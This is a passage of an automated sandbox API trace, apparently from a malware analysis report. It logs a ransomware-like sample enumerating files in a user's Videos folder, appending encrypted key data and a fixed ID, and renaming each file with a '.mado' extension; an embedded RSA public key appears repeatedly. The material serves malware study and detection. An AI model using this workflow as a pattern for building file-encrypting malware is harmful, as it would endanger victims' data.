[0206.226] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.226] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.226] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.226] CloseHandle (hObject=0x63c) returned 1 [0206.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b7b950 [0206.228] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\Rg76NG\\5XwhbW.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ee2u4klmk-3zpweneylp\\rg76ng\\5xwhbw.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\Rg76NG\\5XwhbW.swf.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ee2u4klmk-3zpweneylp\\rg76ng\\5xwhbw.swf.mado")) returned 1 [0206.229] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dfef0c0, ftCreationTime.dwHighDateTime=0x1d5ddfd, ftLastAccessTime.dwLowDateTime=0x305f0330, ftLastAccessTime.dwHighDateTime=0x1d5db99, ftLastWriteTime.dwLowDateTime=0x305f0330, ftLastWriteTime.dwHighDateTime=0x1d5db99, nFileSizeHigh=0x0, nFileSizeLow=0x55fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b-I1Ot6.mkv", cAlternateFileName="")) returned 1 [0206.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x3a67c8 [0206.229] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\Rg76NG\\b-I1Ot6.mkv") returned=".mkv" [0206.229] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\Rg76NG\\b-I1Ot6.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ee2u4klmk-3zpweneylp\\rg76ng\\b-i1ot6.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.229] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=22010) returned 1 [0206.229] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.232] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x55d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.232] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.233] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x55fa, lpOverlapped=0x0) returned 1 [0206.234] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.234] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.234] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.234] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0206.235] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.235] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.235] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.235] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.235] GetLastError () returned 0x0 [0206.235] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.235] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0206.235] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.235] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.235] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.235] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.236] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x55fa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.236] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.236] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.236] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.236] CloseHandle (hObject=0x63c) returned 1 [0206.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b7b950 [0206.237] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\Rg76NG\\b-I1Ot6.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ee2u4klmk-3zpweneylp\\rg76ng\\b-i1ot6.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\Rg76NG\\b-I1Ot6.mkv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ee2u4klmk-3zpweneylp\\rg76ng\\b-i1ot6.mkv.mado")) returned 1 [0206.239] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60005a40, ftCreationTime.dwHighDateTime=0x1d5def4, ftLastAccessTime.dwLowDateTime=0xa97f900, ftLastAccessTime.dwHighDateTime=0x1d5dd7d, ftLastWriteTime.dwLowDateTime=0xa97f900, ftLastWriteTime.dwHighDateTime=0x1d5dd7d, nFileSizeHigh=0x0, nFileSizeLow=0xef24, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DQyXl7.swf", cAlternateFileName="")) returned 1 [0206.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x3a67c8 [0206.239] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\Rg76NG\\DQyXl7.swf") returned=".swf" [0206.239] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\Rg76NG\\DQyXl7.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ee2u4klmk-3zpweneylp\\rg76ng\\dqyxl7.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.239] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=61220) returned 1 [0206.239] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.241] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xeefe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.241] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.243] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xef24, lpOverlapped=0x0) returned 1 [0206.244] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.244] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.244] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.244] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0206.245] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.245] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.245] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.245] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.245] GetLastError () returned 0x0 [0206.245] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.245] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0206.245] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.245] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.245] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.245] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.246] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xef24, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.246] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.246] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.246] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.246] CloseHandle (hObject=0x63c) returned 1 [0206.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b7b950 [0206.247] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\Rg76NG\\DQyXl7.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ee2u4klmk-3zpweneylp\\rg76ng\\dqyxl7.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\Rg76NG\\DQyXl7.swf.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ee2u4klmk-3zpweneylp\\rg76ng\\dqyxl7.swf.mado")) returned 1 [0206.250] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60005a40, ftCreationTime.dwHighDateTime=0x1d5def4, ftLastAccessTime.dwLowDateTime=0xa97f900, ftLastAccessTime.dwHighDateTime=0x1d5dd7d, ftLastWriteTime.dwLowDateTime=0xa97f900, ftLastWriteTime.dwHighDateTime=0x1d5dd7d, nFileSizeHigh=0x0, nFileSizeLow=0xef24, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DQyXl7.swf", cAlternateFileName="")) returned 0 [0206.250] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed98 | out: hHeap=0x2c0000) returned 1 [0206.250] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67168 | out: hHeap=0x2c0000) returned 1 [0206.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321a68 | out: hHeap=0x2c0000) returned 1 [0206.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b670f0 | out: hHeap=0x2c0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321628 | out: hHeap=0x2c0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bd78 | out: hHeap=0x2c0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeff8 | out: hHeap=0x2c0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321738 | out: hHeap=0x2c0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef60 | out: hHeap=0x2c0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeec8 | out: hHeap=0x2c0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3294350 | out: hHeap=0x2c0000) returned 1 [0206.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321738 [0206.251] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 